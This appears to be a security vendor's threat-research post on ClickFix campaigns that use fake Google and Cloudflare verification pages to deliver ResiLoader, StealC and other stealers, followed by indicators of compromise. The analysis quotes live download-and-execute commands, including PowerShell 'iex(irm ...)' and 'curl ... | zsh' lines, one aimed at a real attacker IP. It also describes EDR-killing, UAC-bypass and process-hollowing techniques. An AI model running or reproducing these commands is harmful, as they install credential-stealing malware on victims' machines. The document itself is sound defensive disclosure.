ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices.
A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.
We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer.
In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.
Before we look at the technical details, here’s how to avoid becoming the next victim.
How to stay safe
ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:
- Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does.
- Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem.
- Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.
- Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them.
- Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels.
Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.
Technical analysis
The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.
Different lures, one goal
Most of the campaigns share several characteristics:
- Use of the folder
C:ProgramDataZoomsto extract later stages - PowerShell ClickFix commands that follow similar patterns
- Use of Cloudflare R2 buckets to deliver payloads
- IP addresses hosted by the ASN Dedik Services Limited
- HTML responses containing only the phrase
"hehe"
These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets.
The final command copied by the user usually falls into this pattern:
powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”The port and the path are not always present in the cases analyzed; the ports are random, but some used ones are: 6600, 9900, 5506, 7895, 7493, 149, 8442.
To execute these commands, several ClickFix-related templates are used, mainly related to Google and Cloudflare. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework.
We observed these ClickFix campaigns being distributed through:
- Old websites that have likely expired and been repurchased by the actor(s).
- CloudFlare Pages (
.pages.devdomains). - Compromised websites.
- Fake services, for example related to QR code or web file access.
Google ClickFix lures
The actors behind these campaigns use various Google-related HTML pages and kits.
One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.
Some of these pages have URL parameters like such as “zoneid”, “cost”, “device”, “country”, “clickid”, for example:
/conf/captcha.html?zoneid=10420852/wincapbot/nobot.html/xmr/trkuste.php?zone=5327134bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop

In this case, the functions related to ClickFix are implemented in the class CustomCaptcha. The command is present in clear without any obfuscation.

Another distribution method uses Cloudflare Pages hosted on .pages.dev subdomains.

In this case, the HTML page is obfuscated by declaring several variables and XORing them. The deobfuscated code is called SECURITY GATEWAY and it’s composed of the functions GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, and PanelController.
The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.

We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary.

The interesting part of this ClickFix kit is that it features an “approval gate,” as described in the comments, and that the attacker must manually choose from the panel which command to have the user execute.


In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues.

In the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command:
{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c "iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)""} Other lures
The actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures that copied commands related to the same infrastructure.
The attackers behind these campaigns also compromise multiple websites using different templates related to the CloudFlare ClickFix lure.


We have detected several templates used for CloudFlare pages. The command is present in clear or in some cases obfuscated in the cases analyzed.



We also detected some specifically created fake services websites. For example, a “My QR Generator” site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that the user is not a robot.

In this case the command is encoded in base-64:

PowerShell downloader
The ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name tmp{4 char}.tmp.ps1.
We have detected several variations of this script, but recent versions do the following:
- Create the folder
C:ProgramDataZooms. - Download the next stage from a CloudFlare bucket and save it in
C:ProgramDataZooms. In some variants of the script, the next stage is downloaded directly from an IP. - Send the information of the compromised machine to
http://{IP}/dl-callback. In some variants of the script, this part is not present.

The attackers behind these campaigns use a large number of different payloads.The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. For many of the cases analyzed, the final payload was distributed via DLL Hijacking, as we will also see later for StealC stealer.
| File Distributed | Malware distributed |
libEGL.zip, Safe-1.zip | Trojanized Electron App, ResiLoader and StealC |
Test.msi | Deno Loader and PowerShell Stealer |
arworks.zip | Amatera Stealer |
water-night.zip | Remus Stealer |
Setup.msi, Invintrum_first.msi | NetSupport |
traffic1.msi | CastleLoader |
ibrowser.exe | Rust Stealer |
We analyzed a new loader called ResiLoader that ultimately distributes StealC. We also detected that the threat actor in the latest campaigns has started using Deno to distribute a stealer developed in PowerShell at the end; the analysis of this infection chain could be the subject of a future blog post.
Trojanized Electron app downloads ResiLoader
In this case, the ZIP was downloaded from:
pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip
After extraction to:
C:ProgramDataZoomslibEGL.zip_ext
The zip contains a trojanized version of the open-source messaging app called “Franz”:

The malicious code is implemented in the index.js file:

The downloader performs the following operations:
- Decode the strings with the function
HC(). - Reads
readme.txt, expects a campaign key of the formAAAA-BBBB, returns it as an array of tokens. In this case the name isresiloader-1and for this we call “ResiLoader” the downloaded DLL. - Reads
%APPDATA%setup.txt; if absent, generates a random 8-char string and persists it. - Obtaining persistence using
app.setLoginItemSettings. - Sends a POST request to
https[:]//completstep[.]com/api/and elaborate the JSON response- If
task.eis present, it executeseval(task.e); it allows the attacker to execute arbitrary JavaScript code. - If
task.filesis present, create%TEMP%, decode and write each file; if any filename ends in.exe, run it viachild_process.exec.
- If
In our case we received a ZIP that performs the DLL hijacking of ssh-add.exe:
{"task":{"name":"JUNE18USY","files":{
"msys-2.0.dll":"",
"msys-crypto-3.dll":"",
"msys-gcc_s-seh-1.dll":"",
"ssh-add.exe":"" }}} After, the executable was executed with:
C:WINDOWSsystem32cmd.exe /d /s /c ""C:Users{user}AppDataLocalTemp1782122017599ssh-add.exe"" ResiLoader
The msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion using a BYOD technique, obtain persistence and ultimately loads the stealer StealC. We didn’t find a specific attribution for this loader and so we called it “ResiLoader” based on the string present in previous readme.txt.
The loader contains several strings, some clear and some encrypted. After decrypting the strings, it’s possible to have a full picture of the functionality of the ResiLoader.
MANPO: ReadModule len=...
MANPO: magicOffset=...
…
PERS: FAIL all file copies failed, skipping run key
PERS: FAIL both HKLM and HKCU Run key writes failed
…
RUNPE: CreateProcess failed
RUNPE: PEB patched
RUNPE: VirtualAllocEx failed
…
POST: RunForever exited (unexpected)
POST: entering RunForever
POST: hollow=The loader performs the following operations:
- Extract the encoded blob containing two payloads reading the marker
AtLorenBaseand the length of the encoded blob. After, it decodes the blob and decrypts the driverpcdhost.sys(OPSWAT
AppRemover Driver) and StealC payload using a custom decryption algorithm. - Terminate more than 140 processes related to EDR/AV processes using the dropped driver.
- Perform UAC bypass via
ICMLuaUtilElevated COM Interface. - Create a folder
C:ProgramDataGoogle Update, copying itself; adding persistence using the RUN Registry Key cmd /c start "" /D "C:ProgramDataGoogle Update" ssh-add.exe
In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer.
IOCs
Hash
72907d0ca3258365838626f6a8d993a6: ResiLoader DLL
0234E3188F2883A438B3F2BEAB7A78B2: StealC
6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus
206ce339febca0c3bcc850f42595fc63: Amatera Stealer
eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT
b8d53740024d126cb55f83854335a4ab: Rust Stealer
Domains
Distribute ClickFix pages:
onegeekworld[.]com
thefirmos[.]com
antibotv3[.]com
centralwildcats[.]com
cloud.antibotv3[.]com
cloudautosolutions[.]com
sunseekersupply[.]com
123clocks[.]com
orcanegames[.]com
rwmonitoring[.]com
100furniture[.]com
nepalcharchaa[.]com
p-floribunds.pages[.]dev
pg-altirade2.pages[.]dev
pg-cordivant-m6.pages[.]dev
g-luminence.pages[.]dev
generator-qrcode[.]online
regdev-google[.]com
khosla[.]capital
eorgke09054909j[.]com
dropboxi[.]com
CloudFlare buckets used for payload distribution:
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-620528e2dc874e16937673265aa23d39.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-9682d5896df841679c5a17eb41273f89.r2[.]dev
pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev
pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
unitedstateverif[.]com: payload distribution
bigflaredefence[.]com: payload distribution
popularcard[.]shop: Rust Stealer C2
xzz[.]proxygrid[.]cc: Amatera Stealer C2
completstep[.]com: Loader C2
eventlogerps1[.]ink: Deno Loader
be231ro963[.]com: Deno Loader
IPs
IP used for payload distribution:
151.240.151[.]126
85.239.149[.]16
85.239.149[.]40
93.152.224[.]29
151.240.151[.]46
93.152.224[.]167
85.239.149[.]78
192.69.195[.]131
135.181.171[.]40
94.26.83[.]206
91.92.34[.]128
85.239.144[.]31
93.152.224[.]39
94.26.90[.]112
146.19.248[.]120: StealC C2

